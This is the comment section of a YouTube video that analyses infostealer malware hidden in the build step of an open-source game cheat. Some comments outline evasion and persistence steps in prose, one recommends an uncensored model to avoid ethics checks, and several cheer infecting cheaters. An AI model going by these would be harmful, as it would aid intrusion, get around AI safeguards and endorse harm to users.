How this OPEN SOURCE "Cheat" Hacks You

  • Published on 11 Jan 2025

Comments • 531

  • @p0008874 5 months ago +1745

    > Open source
    > Look inside
    > Electron slop
    Yes it's toddler malware.

    • @oakley6889 5 months ago +163

      "most cheats are written in something low level so they can access memory" ... electron app. He really thought this one might be a little smarter than the usual crap hey

    • @nezu_cc 5 months ago

      To be fair, electron is probably the most reliable way to stay undetected for a long time. I have samples that have been out there in the wild for a few months now and they are still mostly undetected. A simple hello world in C with the wrong import will get you more detections on vt than a full blown infostealer bundled as electron app. Bonus points if you steal the main executable from a legitimate app, cuz now you have a signed, very popular, universally trusted binary doing all the dirty work.

    • @Dovias-v3v 5 months ago +38

      i mean he's kinda smart. Even though this kind of attack is designed for windows machines, electron apps are cross platform and he can make it work on linux or macOS whenever he wants (not saying that it would be easier to do something like this)

    • @DudeSoWin 5 months ago +10

      When a Papa malware drops a load onto a motherboard and you confuse the size of his tool for a child's leg. (Bro you should become an archeologist then you can confuse dinosaur poop with dinosaurs because who cares its all a bunch of dead crap anyway not like it predicts where large sums of gold deposits are located within the earth. lolololol)

    • @stfu_ayden 5 months ago +86

      @DudeSoWin dude what

  • @KillianTwew 5 months ago +295

    0:37 not only are they reading the comments, but they probably are the comments pointing people to their malicious cheats

    • @austinbaccus 5 months ago +2

      Or... It's the guy on TH-cam writing the comment about them making the comments 🤨

    • @DMaichee 4 months ago +6

      @austinbaccus it could be you! it could be me! it could even b-

    • @Yerjckk 3 months ago

      Sus

  • @rebok232 5 months ago +329

    the commit names are so professional, good work from their side completely legit

  • @yama900 5 months ago +108

    The malware is pretty classic, however hiding it during compile time is really clever

    • @BorderKeeper 5 months ago +12

      Imagine being a kid and your first foray into programming is cloning a cheat, installing visual studio, and then getting your computer infected. Hope they learned something from that
      EDIT: I also dabbled into Call of Duty 2 cheats when I was a kid. Kids are stupid okay we were all there once.

    • @soheibmemes2594 4 months ago

      @BorderKeeper I remember installing CS 1.6 hacks and they did work, I used to destroy servers but my PC was sooooooo slow
      I'm pretty sure they were mining crypto on my mom's laptop lol

    • @rubikquitous8482 4 months ago

      @BorderKeeper tbh that's how u learn sometimes.

    • @mrjordan2000fun 3 months ago +1

      @BorderKeeper i never cheated in any game as a kid, you were just a rat lmao

  • @seasonedsketches 5 months ago +155

    The victim? That's karma for cheating in a game.

    • @Rookinton 4 months ago +15

      That's what I was thinking, kinda bothered me that he called the cheater a victim.

    • @tjlazer6631 4 months ago +2

      So karma only works on you when you download it for free instead of paying for it from a legit seller?

    • @cornelius2993 3 months ago +3

      @Rookinton from a "technical" perspective it's called a victim. The ethics regarding cheating are not the focus of this video.

    • @Rookinton 3 months ago +3

      @cornelius2993 Not really. That'd be similar to saying that a bank robber got hit by a car when he was fleeing, and the car drove away. So now it's a hit and run victim, not a bank robber?

    • @hal0 3 months ago +1

      @Rookinton so I think that means he's both a robber and a hit and run victim

  • @Rockyreal-h1b 5 months ago +55

    idk anything about cheating or coding, but your videos are very good with good info on these rats and hidden malwares! it's enjoyable to watch. thanks

  • @GeorgeAlexanderTrebek 5 months ago +72

    Big wall of base64, ah yes perfectly legit hacks..

    • @realbasherverse 3 months ago +3

      "open source" but when you open the source it's a grand canyon of base64 hidden payloads

  • @0owmjapo0 5 months ago +108

    This might seem like a stupid question but how do people deal with info stealers? Seems like a game over kind of thing. You just lose all your accounts? Is it only if you sign into something after installing the stealer? So you don't lose everything but it's still an awful thing to go through. Seems like a nightmare.

    • @EricParker 5 months ago +115

      It’s actually a good question I will address in an upcoming video. It’s any password or cookie saved on the affected system. Most stealers are not persistent but some are.
      Basic recovery guide is change every password, and any app that gives you the option to terminate all sessions do it.

    • @seansingh4421 5 months ago +14

      If you have hardware based 2FA like FIDO2, even if your password gets stolen, bad actors cannot access your account

    • @420iceninja 5 months ago +13

      Never save passwords

    • @ZZxlizrx 5 months ago +18

      U disconnect from Wi-Fi on your infected device and change ur passwords from another device

    • @infiniminer7677 5 months ago +1

      @EricParker if you're logged in to your email on your browser but you haven't saved your password in the browser, can an info stealer gain access to your email?

  • @guyvvbhvgdcvhyf-yl4ol 5 months ago +45

    No, source code is not enough, it needs to be reviewed. If it's open, not used, and you can't review, then you're just as effed as if it's closed source.

  • @sharknoms4467 5 months ago +154

    *Looks up a cheat for an online game*
    *Is fully aware that cheating in said online game ruins the fun for legit players*
    *Complains that said cheat contains malware*
    *Lack of self-awareness intensifies*
    Cheaters are so pathetic.

    • @noelemblem 5 months ago +18

      their suffering is now our content, lol

    • @knight808. 5 months ago +19

      There’s a huge difference between cheating in a game and stealing someone’s information 🤨

    • @sharknoms4467 5 months ago +42

      @knight808.
      Sorry but no compassion from me if you cheat in multiplayer games.

    • @Felix-Memoria. 5 months ago

      Nah, the cheaters are taking my free time, so there should be taken something from them as well, an eye for an eye @knight808.

    • @polysteamgaming 5 months ago

      @knight808. it's endless fun to watch a cheater cry ^^

  • @cool-username-u9r 5 months ago +486

    the cat ears remember

    • @EricParker 5 months ago +122

      almost 2/3 there. I'm guessing early Sept.
      More concrete planning for the stream around 85k.

    • @someonestuff_ 5 months ago +5

      I don't think so tim

    • @trihexer 5 months ago +6

      subbed

    • @YourLocalBaconYLB 5 months ago

      I don't think. He promised ONLY the cat ears @U8A

    • @ImNotSimon_totally 5 months ago +1

      ew

  • @ZeptionT 5 months ago +82

    It running at compile time is clever.

    • @doanamo 5 months ago +15

      It's not running at compile time though. It's a prebuild step, so before any compilation actually happens.

    • @frostypw 5 months ago

      @doanamo 🤓

    • @gabriellevesque2185 5 months ago

      @doanamo AcTuAlLy.
      The point is the same... runs when you build.

    • @seedney 5 months ago

      @doanamo so Gentoo is still a safe distro? ;-)

  • @Mazendrak 5 months ago +407

    Maybe just don't cheat

    • @sigmamale4147 5 months ago +64

      @zypher-x3d no skill

    • @JonnyAppleWeed 5 months ago

      In a perfect world, but we all know you'd cheat on something, too, if you felt you could benefit. 🤷

    • @AttacMage 5 months ago +33

      @zypher-x3d holy slop channel, Batman. If you're gonna cheat (and upload it to TH-cam no less) at least make it interesting.

    • @9hoot789 5 months ago +18

      @zypher-x3d someone's clearly never gotten his block knocked off before

    • @griffin1366 5 months ago +8

      @zypher-x3d HAHAHAAHAHAHAHAAHAAHAHAHAHAAHAHAHAH

  • @breeziemcfreezie 5 months ago +125

    i find it REALLY hard to feel bad for people cheating in competitive online games lol

    • @Silentlib 5 months ago +4

      Well, think about it this way: they cheat knowing they will get banned, not get their expensive computer or credit card info used and ratted

    • @InfinityForumTV 5 months ago +23

      @Silentlib They simply asked for that. I am really angry that after Eric's video he removed his github. There should be more "open-source" cheats doing that shit.

    • @Silentlib 5 months ago +4

      @InfinityForumTV no no, i just told you what they asked for. i think cheating in tarkov is scummy but not scummy enough to lose thousands of dollars, i think it's a moral difference ig

    • @sacman4611 5 months ago +11

      @SilentRtserpentslyfe if you don't want your computer messed with don't install shady stuff like cheats lol

    • @Silentlib 5 months ago

      @sacman4611 i guess

  • @9SMTM6 5 months ago +5

    I agree with your statement about UAC bypass, if we're speaking of a general target.
    However, we're speaking of people that are knowledgeable enough to download and compile some cheat here, so I think a UAC bypass might be worth it here. Particularly if the payload triggers (and thus needs to get through UAC) during build.

  • @UNcommonSenseAUS 5 months ago +119

    99% of cheats are, or include malware...
    Unless you can decompile or otherwise analyse the code yourself it's a fool's errand, unless using disposable or containerised machines.

    • @kulled 5 months ago +46

      where did you get the 99% figure from?

    • @4r76rt3h4fjiksda 5 months ago +96

      bro decompiled and analysed 100% of them

    • @XOREboyyyy 5 months ago +8

      Do you mean because of the mechanism / techniques they use or why?
      Sure thing, a cheat provider will provide you a loader, not the cheat. The cheat then gets loaded from a server like a payload.
      This doesn't mean directly that a person like x22 or someone will inject a virus into ur pc - yes they could, but they are making more money off ppl buying their cheat.

    • @PolumbiusTheThird 5 months ago +4

      most hacks are safe. if they don't include a virus scan don't dl.

    • @lackahs 5 months ago +9

      @PolumbiusTheThird they will most likely trigger antiviruses anyway due to their nature, rpm and wpm will most likely do it, same with anything to do with system

  • @XxXDeadlykingdxXxX 5 months ago +17

    You say that open source cheats are bad because the anti cheat will detect them; however, EAC on Linux for example runs in usermode, and so any cheat that doesn't write to memory, with 2-3 precaution steps like running the cheat at root level and hiding root pids, will be undetectable.

    • @aftdawn 5 months ago +10

      It's not that it can't detect, it's that the code is open, so if a dev finds the repo then they can try to patch it out, cause again, they know exactly what it's doing

    • @rogo7330 5 months ago +1

      You can trick a user into disabling everything if they're stupid enough to run this kind of code (including anticheat and the game) on their main system where everything can be snatched. Everything that "requires" root and is not controlled by you automatically goes into VM territory.

    • @ChristopherGray00 3 months ago

      most ACs utilize memory pattern checks and foreign memory detection to get around most of this, yes if you theoretically had a permission level above that of the AC and only do reads from the memory, this would be clientside undetectable.
      but the problem comes when you realize many fundamental cheat functions rely on writing to memory, once you write to the game's memory it doesn't matter what permission you're at, the game's client can see what lies in its own memory space and this is where most cheats get dumped, analysed and detected.
      so to get around this you'd basically have a third program giving fake mouse/keyboard inputs based off of what it knows about the game instance, you'd also have to make sure that this all seems natural and fine on the serverside heuristics as well, which is a whole nother ballgame in its own right.
      then that's typically where you'll begin to notice that, if the AC developer is actually devoted, it's really not a trivial task at all to make an undetectable cheat simply by being a privilege level above it.

  • @mu11668B 5 months ago +41

    That exe file is likely harmless. The real deal in electron malware usually lies in resource/app.asar, except for the 3CX one done by the DPRK.

  • @_Originator 5 months ago +57

    Rly? VBS malware? Guys, it's 2024!

    • @Jukecallaaa 5 months ago +10

      we digging up the 1990s gems with this one

    • @metaorior 5 months ago +1

      It's Windows time. The BSOD CrowdStrike event was only CrowdStrike's fault, yeah

    • @MatthewJaws 5 months ago +7

      reject modernity, return to vbs

    • @rogo7330 5 months ago +6

      > it's 2024
      Exactly why. Most people don't know how to search for information and just give up. They could program it in powershell, but that would be easier for dummies to deal with.

    • @Skaffa 5 months ago

      it's always been used due to its ease of use for the purpose

  • @pward17 5 months ago +40

    Cheaters should get hacked though

  • @harrygray2118 5 months ago +1

    I feel like this was sloppy coding on the malicious person, no thorough obfuscation, it was clearly an attempt on the less tech savvy. But I’m glad you presented this, hopefully people who are inclined to cheat will not take the risk and actually think about how they are compromising their systems. 10/10.

  • @osijtcrunch8500 3 months ago +2

    this malware is doing god's work putting cheaters in their place

  • @realg2279 3 months ago +2

    Maybe edit your title and include “Tarkov” somewhere
    I would bet it will boost your views pretty much
    Btw, thx for this video!

  • @lukafireman 5 months ago +2

    NGL, that moment when you opened the webpage and it was node, I was like, yep, toddler level.
    Compile exe to run CMD to disable powershell policies to bypass prompts and UAC.
    Then use CMD to obfuscate and add persistence via registry Autostart, task scheduler, add script support, disable other viruses and antiviruses.
    (since basically CMD is the weakest link on most systems, outside of the users themselves)
    Actually take over most parts of the system without the user noticing.
    Only then will the actual payload be delivered.
    (You didn't touch on this in the video though).
    I'd love to see you go through the entire payload step by step, de-obfuscating and teaching the young-ins how to be resourceful.
    It'd also be pretty educational to include the names and links to any and all tools used, and sources of info.

  • @foxter_exe 4 months ago +1

    so what does this malware actually do when it's run? does it log and store passwords or does it use your computer as a miner. I'm sure you mentioned it in the video somewhere but I'm not big on coding jargon so I didn't really pick up what it does

  • @PrincessColumbidae 5 months ago +17

    1:57 what AI is that? I never knew it was good at detecting malware, especially identifying it
    Ah, it's Claude. I'd never heard of it before!

  • @anony-moon 5 months ago +2

    WOAH just found your channel yesterday lol and you just uploaded!

  • @tuskiomisham 5 months ago +6

    what programs are you using for forensics here?

    • @EricParker 5 months ago +13

      Sandboxes and manual analysis (reading and re-writing the scripts manually with some AI assistance). Any.run is the main one.

    • @Synflood-dot-txt 5 months ago

      Thanks bud @EricParker

  • @tobilike1015 5 months ago +6

    What I don't understand: why is it even possible to disable Windows Defender in the registry? The same goes for the security settings.
    This should all be encrypted. For example, you can use the WindowsKey to decrypt/encrypt, it is unique and it is already encrypted.
    Or am I thinking wrong?

  • @grn-xx 5 months ago +4

    This looks like it is impersonating some processes like search filter. Is there an easy way to detect those? For example if the process is causing an unusually high cpu load, is it possible to check if the underlying exe is real?

    • @arsh6212 5 months ago +7

      He just checked it here: run it in a sandbox and see what it does in a process monitor. Unusually high cpu load actually will not be very common because it is just sending short commands, but you may be able to see it doing the commands via task manager or more likely process monitor.
      You can also run strings on the exe in a sandbox, a lot of the time it will show the cmds or some important strings like a dropper domain name

    • @LennyMiller739 5 months ago +2

      Process Explorer can show you a bit of info. It can even get a VirusTotal report on them

  • @Gajimara 5 months ago

    i love how your videos always leave me smarter than before!

  • @Z3rgatul 5 months ago +5

    11:55 I don't agree that UAC bypass is the worse option here. This thing is supposed to trick developers, who have Visual Studio or MSBuild and have some understanding of how things work.
    I am a developer, and I never run things as admin unless it is necessary. A random UAC prompt will put my brain into alert mode, and I will definitely check what's going on.
    Even when a UAC prompt is expected I always check the digital signature of the executable at least.

    • @grayman2749 5 months ago +4

      Great, but you forget that you are not tricking developers, you are tricking 13 year old kids who want to cheat in Tarkov.

    • @Z3rgatul 5 months ago

      @grayman2749 a 13 yo is going to download the compiled version, 13 yos don't understand why they should build software by themselves

  • @davel4030 5 months ago +2

    Lol I've been a programmer for a couple decades and I've seen a lot of things hidden in source as resources, active controls, libraries, etc. just because you can read the code doesn't mean people do

  • @JKeyy.. 4 months ago +1

    Tristan tate teaching me about dangerous open source

  • @fd20231 5 months ago +4

    Awesome content!! Super newbie here but thoroughly interested and pleased with your content sir!!

  • @Khosumi 5 months ago +1

    why do all of them use base64 encoding? You might as well have it be plain at that point

  • @dfcw 4 months ago

    How do you protect yourself in a general sense? I know in theory I could do what you did in the video, but that is quite in depth to do every time for new software, and for someone without cyber security knowledge.

    • @mr.frogster4398 4 months ago

      @dfcw easy way to protect yourself from malware in cheats is to get a life and stop downloading cheats….

  • @99temporal 5 months ago +22

    "oh yeah, open source is really secure, because you can read the code"
    >Doesn't read the code
    >Or reads the code, and ignores a bunch of weird looking strings in the code
    >Gets hacked
    >**Surprised Pikachu face**

    • @Luzum 5 months ago +1

      you're not going to be reading the project file code, you usually read the ACTUAL source code, the malware here was hiding in the PreBuildEvent in the project file. Nobody looks at that, except people who knew about this little loophole with visual studio, and knew that malware can hide there

    • @99temporal 5 months ago +3

      @Luzum you should be reading everything, basically. Project file, make file, test cases (this is how xz utils got hacked, through test cases hooking into compiling)
      If it was committed, you should be reading it... ESPECIALLY if it runs with elevated privileges
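The two replies above make the point that the project file is part of the code you have to read, because a PreBuildEvent runs with the builder's own privileges before anything is compiled. The following is an added example of that check, not code from the video or from any commenter: it parses MSBuild project XML and reports every build-time hook, flagging traits like long base64-looking tokens, encoded PowerShell and script hosts. The hook element names and the sample project file are assumptions constructed for the demo.

```python
# Added example (not from the video or any commenter): list the build-time
# hooks in an MSBuild project file before building an untrusted clone.
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Elements whose text (or nested <Command>) MSBuild runs as a shell command;
# assumption covering the common .csproj/.vcxproj layouts.
HOOK_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent", "CustomBuildStep"}

# Heuristics, not signatures: each names a trait that deserves a second look.
SUSPICIOUS = [
    (re.compile(r"[A-Za-z0-9+/]{60,}={0,2}"), "long base64-looking token"),
    (re.compile(r"\b(powershell|pwsh)\b", re.I), "launches PowerShell"),
    (re.compile(r"-enc(odedcommand)?\b", re.I), "encoded PowerShell command"),
    (re.compile(r"\b(wscript|cscript)\b", re.I), "runs a VBScript host"),
    (re.compile(r"\b(curl|wget|bitsadmin|certutil|Invoke-WebRequest|iwr)\b", re.I),
     "downloads from the network"),
    (re.compile(r"\breg(\.exe)?\s+add\b", re.I), "edits the registry"),
    (re.compile(r"\bschtasks\b", re.I), "creates a scheduled task"),
]


@dataclass
class Finding:
    file: str
    tag: str      # which hook the command came from
    reason: str   # why it was reported
    snippet: str  # first 80 characters of the command


def _local(tag: str) -> str:
    """Strip the XML namespace: older csproj files use the MSBuild 2003 one."""
    return tag.rsplit("}", 1)[-1]


def scan_project_xml(xml_text: str, filename: str = "project.csproj") -> list[Finding]:
    """One Finding per (hook, reason). A hook with no suspicious trait is still
    reported as 'build hook present' so the reviewer actually reads it."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        tag = _local(elem.tag)
        if tag == "Exec":                 # <Exec Command="..."/> inside a <Target>
            cmd = elem.get("Command", "")
        elif tag in HOOK_TAGS:            # element text, or nested <Command> in vcxproj
            cmd = "".join(elem.itertext())
        else:
            continue
        cmd = " ".join(cmd.split())       # collapse whitespace padding tricks
        if not cmd:
            continue
        reasons = [why for pat, why in SUSPICIOUS if pat.search(cmd)]
        for why in reasons or ["build hook present"]:
            findings.append(Finding(filename, tag, why, cmd[:80]))
    return findings


# Constructed sample, not a real repository: one noisy pre-build hook, one
# ordinary post-build copy step, and a Target that fetches a file.
SAMPLE_CSPROJ = """<?xml version="1.0" encoding="utf-8"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PreBuildEvent>powershell -ExecutionPolicy Bypass -EncodedCommand {blob}</PreBuildEvent>
    <PostBuildEvent>xcopy /y "$(TargetDir)*.dll" "$(SolutionDir)out\\"</PostBuildEvent>
  </PropertyGroup>
  <Target Name="Fetch" BeforeTargets="Build">
    <Exec Command="curl -o helper.exe https://example.invalid/helper.exe" />
  </Target>
</Project>
""".format(blob="QUJD" * 20)   # 80 chars of filler standing in for a base64 payload


if __name__ == "__main__":
    for f in scan_project_xml(SAMPLE_CSPROJ, "sample.csproj"):
        print(f"{f.file}: <{f.tag}> {f.reason}: {f.snippet}")
```

Run it against every `*.csproj`/`*.vcxproj` in a clone before opening the solution; anything it prints is a command that will execute on your machine the moment you build.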

  • @Ageassia 5 months ago +2

    Sometimes I wonder if blocking pastebin in the DNS resolver or hosts file can mess with those kind of scripts, since a lot of them use that ... yes you can't use pastebin anymore but it's the lesser evil here ... Also, virus total is clearly not useful for years now, that's a shame ...

    • @DxBlack 5 months ago +1

      ...they don't even need to use pastebin, they can use blogger or any free blog host and put the command somewhere in a post. You'd be on a fool's errand trying to block everything.

  • @milacc0000 5 months ago +1

    This is how the XZ incident happened. If one includes the build in the repository, you should doubt it.

    • @nmlss-r9 5 months ago +4

      I mean yes, check it, but lots of non malicious open source upload the build to make it easier to build and keep it in sync with the rest of the project.

  • @ericmurtagh629 3 months ago

    do you have any videos on how to remove any potential malware on your pc outside of using basic things like windows defender or malware bytes to ensure my pc is clean?

  • @BendyPlays 5 months ago

    I keep seeing you in my recommended and it's so weird. I have interests in both computers and in roblox, and you happened to make videos on both. Kinda strange how I found you and watched you in totally different ways.

  • @elektrokinesis4150 5 months ago +1

    oh this kind of stuff is everywhere in the cheat space, you guys have got to be careful now

    • @mr.frogster4398 4 months ago

      @elektrokinesis4150 good, hope malware continues to be put in more cheats

  • @robertoaureli2813 5 months ago +1

    Is Detect It Easy safe? The software for the VM is still Detect It Easy, right? Thanks in advance for the help

  • @jjjjulian 5 months ago +1

    what's the point of Base64? Why don't they obfuscate the code?

  • @mehrmehtenvieh 5 months ago

    I'm glad I found your channel. It is super interesting!

  • @JulioNatanaell 3 months ago

    Why is the anti-analysis system trying to get rid of Insomnia, which is an API tester??

  • @LunarBulletDev 3 months ago +1

    is the hack dev the villain or the hero? cause cheats kill countless great games, for example, the cycle frontier was an awesome persistent world free to play looter shooter like tarkov which was killed by cheaters. I'd say screwing up cheaters is alright in my book

  • @happyts-00 5 months ago +7

    "ctrl + /" to comment a line in the file extension's appropriate syntax in visual studio code

  • @test-rj2vl 4 months ago

    I wonder why antivirus software can't have generic detection that would throw a warning if it sees a base64 encoded vbs file or a ton of empty spaces between lines of code? I mean these things repeat from malware to malware so it would be easy to show a dialog that shows the suspicious parts one by one and at the end let the user decide.

  • @cutemarxist 5 months ago +1

    what is that ai you are using at 1:57?

    • @christianmingle3394 5 months ago +1

      He says it right before he shows it, it’s Claude

  • @awesomecronk7183 5 months ago +4

    Hiding in the build script reminds me of the XZ backdoor where the malicious component was hidden in the tests and injected the backdoor into the binary after compiling, during testing

  • @mushroomcraft 5 months ago

    11:56 so true, that prompt pops up on EVERYTHING, so Windows users have been desensitized to it, because Windows' permissions structure is awful. You can't get any apps to install without admin. I think there's a UAC bypass, because the victim isn't running the program, they are only compiling it, so a random UAC prompt would be weird. Also, you have to compile it yourself, so I guess the malware is designed for people with a bit more knowledge.
    Ultimately, cheats are designed for bad actors, so there's going to be more malware around cheats.

  • @Shiver52 3 months ago +1

    WAIT WAIT
    SO IF EXPLOITERS GET HACKED THAT MEANS LESS HACKERS
    LESS HACKERS = MORE GOOD PLAYERS
    GOOD PLAYERS = WINNING MORE MONEY CUZ NO HACKERS
    WINNING MORE MONEY CUZ NO HACKERS = GET RICH FAST ASF

  • @karl2903 4 months ago +2

    love this. we need more cheats like this.

  • @S-G-zm3uu 3 months ago +1

    Based. Cheaters never win.

  • @amandopurperhart1351 4 months ago +2

    Someone doing god's work with this malware in cheats

  • @Th3Premium 5 months ago

    More malware analysis pleaseee

  • @Bnryzombie 5 months ago +8

    Oh man, now I'm going to have to do all builds in a VM. Just when I started to get comfy. Thanks.

  • @FortniteOGClips2 5 months ago

    Hello, in the last couple of weeks there were some controversies with Roblox Account Manager, which is open source. After a recent update antiviruses started detecting it as a virus. Devs are saying that's a false positive. Any chance you can check it out?

  • @steadexe 5 months ago +1

    With so many stages and processes, hopefully it would probably trigger an EDR

    • @cowbutt6 5 months ago

      Very few gamers will be using EDR solutions on their gaming systems, though...

  • @BudgiePanic 4 months ago +1

    Jia Tan strikes again

  • @ImTrashOnPurpose 4 months ago

    you a dork for letting cheaters know about malicious cheats. they deserve it.

  • @Ankpudding 5 months ago

    What hypervisor are you using?

  • @whamer100 5 months ago

    and this is why I'd look at the code (yes including build scripts) and build from source if I'm doing anything from something I don't trust

  • @DoomsayerStudios 5 months ago

    11:30 Sonic.exe was chasing me until I took that specific advice to get rid of him
    Thanks Eric!

  • @GazziFX 5 months ago +1

    I saw a lot of repos like this, they all have that long repository name and tags, and colorful readme

  • @oxidelive 5 months ago +2

    what windows anti virus would you recommend?

    • @shabath 5 months ago +27

      Linux.

    • @foobar83 5 months ago +5

      @shabath are you insane?

    • @ChaosAtlantis33 5 months ago

      windows defender is fine, you have to be an advanced idiot to mess up 🙏

    • @mags247 5 months ago +3

      A hammer

    • @EricParker 5 months ago +14

      Have thought about making a video but I have a hard time recommending anything. I briefly experimented with Bitdefender on my windows partition and quite liked it, but it doesn't mix well with the debugging / reversing tools I use.
      Might be worth testing a few from my usual sources (TH-cam & github), most testers just use samples from sample sites, but the problem with that is it's obviously going to be detected. It's more interesting to see heuristic detections, but none of them do it very well. I have thought about trying to make an anti infostealer utility myself.

  • @AlbertEinsteinGER 5 months ago +3

    Should I reset my computer fully, or is a Malwarebytes full scan enough with rootkits?

    • @EricParker 5 months ago +14

      Generally depends how old the malware is. Fresh samples are usually undetected for a while.

  • @ThatsSoCrazy92 5 months ago +11

    Easy fix: don't be a pos and download cheats. Wish every cheat had malware and would steal every cheater's identity.

    • @pyrosupreme4473 4 months ago

      Me too, if I get to the point in life where I have money to blow I might start commissioning this type of work to be done

    • @KatherineFtw 4 months ago

      How about I should be allowed to cheat in my singleplayer game?

    • @Elemental_Clash 4 months ago +1

      @KatherineFtw They likely mean cheats for multiplayer games. Almost no one cares if you cheat in a singleplayer game

  • @xtc-42 5 months ago

    0:50 This is not true at all; there are many games where the developers don't care or take a very long time.

  • @someone4229 5 months ago

    Am I able to submit you malware that you could check?

  • @1Pxul 4 months ago

    that's why u check the star count
    anything below 30 is unsafe and even if it is above 30 I check if its from a known dev

    • @mr.frogster4398 4 months ago

      @1Pxul easiest way to stay safe is to not be a weirdo that downloads cheats because they have some sort of ego problem….

    • @1Pxul 4 months ago

      @mr.frogster4398 cope harder bro

  • @JohnDoe-ln8jp 5 months ago

    why not dump the electron source code (asar)

  • @jarroberts27 4 months ago +2

    just seems like karma to me

  • @ianbrooks9686
    @ianbrooks9686 4 months ago +2

    Don't help these savages ...

  • @Jcorella
    @Jcorella 5 months ago +1

    This happened to my buddy Eric once.

  • @jamphire_
    @jamphire_ 5 months ago

    My first thought was: but why the Edge browser?

    • @jean-mauricenestler3761
      @jean-mauricenestler3761 5 months ago +1

      Probably because it's a VM and he did not bother to install a different browser

    • @jamphire_
      @jamphire_ 5 months ago

      @@jean-mauricenestler3761 True, but even visually seeing Edge makes me nauseous :))

  • @Bruhlk
    @Bruhlk 4 months ago +1

    Honestly, with Tarkov's cheating issue this is great.

  • @sortaspicey9278
    @sortaspicey9278 5 months ago +1

    I have nearly 2,000 hours in Escape from Tarkov, and quite frankly, I don't really care about cheaters most of the time. You can't tell how you died. Anyway, I think in the time I've been playing I have seen one blatantly obvious cheater. That being said, I actually support people releasing hacks with this in them. Hackers are lame.

  • @alixcozmo
    @alixcozmo 5 months ago +1

    This was interesting, good video!

  • @ッZoroッ
    @ッZoroッ 5 months ago +3

    "Made the cheat with genuine intentions"
    LMAOOOOO

  • @wheeI
    @wheeI 3 months ago

    0:56 That's not true lmao. For years the best cheat for TF2 was open source.

  • @Aieieo
    @Aieieo 5 months ago

    Also, instead of Claude, see if you can run Dolphin Llama. It won't bug you about ethics.

  • @kipchickensout
    @kipchickensout 5 months ago

    Very interesting find!
    I haven't heard of any big problems with Windows Defender when it came to cheats, but Avira, McAfee or especially Avast etc. liked to delete some of the DLLs or even cause bluescreens because of device drivers somehow clashing with the cheat's.
    Usually for cheat sources you don't go there but to forums, I'd say. Also, the name of that project is not something you'd usually see; who lists the features in the name xD?
    BTW, for internals I see mostly C++, but for externals I also saw a good share of C#.
    If you paste, you should still know what you're pasting, and either way cheaters deserve it.

  • @petersmythe6462
    @petersmythe6462 5 months ago +4

    Anticheat developers and malware cheat developers have strangely aligned interests.😂

  • @j233wfyw
    @j233wfyw 5 months ago

    Can you share the files? Because the original GitHub repository is deleted lol. I'm pretty sure the guy saw this video, so he removed it lol.

  • @griffin1366
    @griffin1366 5 months ago +3

    Get what you deserve for cheating.

  • @balloonstudios3920
    @balloonstudios3920 4 months ago

    The UAC bypass was used because it sets itself to run at startup.

  • @KaelinatorPVP
    @KaelinatorPVP 5 months ago

    3:56
    "Do you trust the authors?"
    > Yes, I trust the authors ✅👍😁🙌
    💀

  • @TGFEVR
    @TGFEVR 5 months ago +2

    Gotta be the best YouTuber.

  • @Hnkka
    @Hnkka 3 months ago

    Without watching this video, I guess it's Base64 code hidden in the source? I will watch the video now and see if my wild guess was correct.

  • @mtk3078
    @mtk3078 5 months ago

    Can you make a video about Hardware ID spoofers? They seem malicious.

    • @EricParker
      @EricParker 5 months ago +4

      I do want to make a more general one on the bootkits behind such things. They are not always malicious, but they make your system ultra insecure.

    • @mr.frogster4398
      @mr.frogster4398 4 months ago

      @@mtk3078 The bulk of cheat-related stuff is malicious because most people downloading cheats are simple and pretty easy to trick, so they're just easy targets for malware. Easiest solution is to grow up and stop cheating in video games.

  • @pyrosupreme4473
    @pyrosupreme4473 4 months ago +4

    I hope more people design cheats with malware included 🤗

  • @thearchitecht2122
    @thearchitecht2122 5 months ago

    All in all, good video. My only critique is of the window sizes and the constant scrolling. Also, you did not show what the malware does in a sandbox...

  • @rch5395
    @rch5395 5 months ago +2

    I use TempleOS btw.

  • @Valerius123
    @Valerius123 5 months ago +3

    Haha, hacking cheaters under the premise of providing them with free and open source cheats! Great bait. One group of people I couldn't care less about, too. Honestly, this might be an effective strategy to combat cheaters. Just flood the market with malware cheats. If there are more traps than food the dogs will eventually go somewhere else.

  • @getawaydriver101
    @getawaydriver101 5 months ago

    Needs to send Malwarebytes a report for account reporting so they can update the system. Malwarebytes has to be custom configured; there are roughly 70 to 100 settings depending on the version of a PowerPoints. The Standard Version, when it comes with 30 settings, instructors Cardinal protectors got to configure it right, and he could have had a fake Malwarebytes too.

  • @JohnnyMachiavelli
    @JohnnyMachiavelli 3 months ago

    Guy's worried about malware while he's running Microsoft's AI "Copilot" malware.

  • @isheamongus811
    @isheamongus811 5 months ago

    Reproducible? If not, best to build from source, not knowing if the binaries correspond to the source.